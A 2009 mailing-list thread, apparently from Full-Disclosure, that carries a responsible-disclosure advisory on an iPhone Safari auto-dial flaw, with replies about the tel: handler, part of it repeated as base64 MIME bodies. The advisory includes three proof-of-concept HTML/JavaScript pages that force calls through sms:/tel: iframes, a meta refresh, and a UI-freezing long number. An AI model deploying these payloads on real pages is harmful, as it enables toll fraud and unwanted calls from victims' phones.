DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
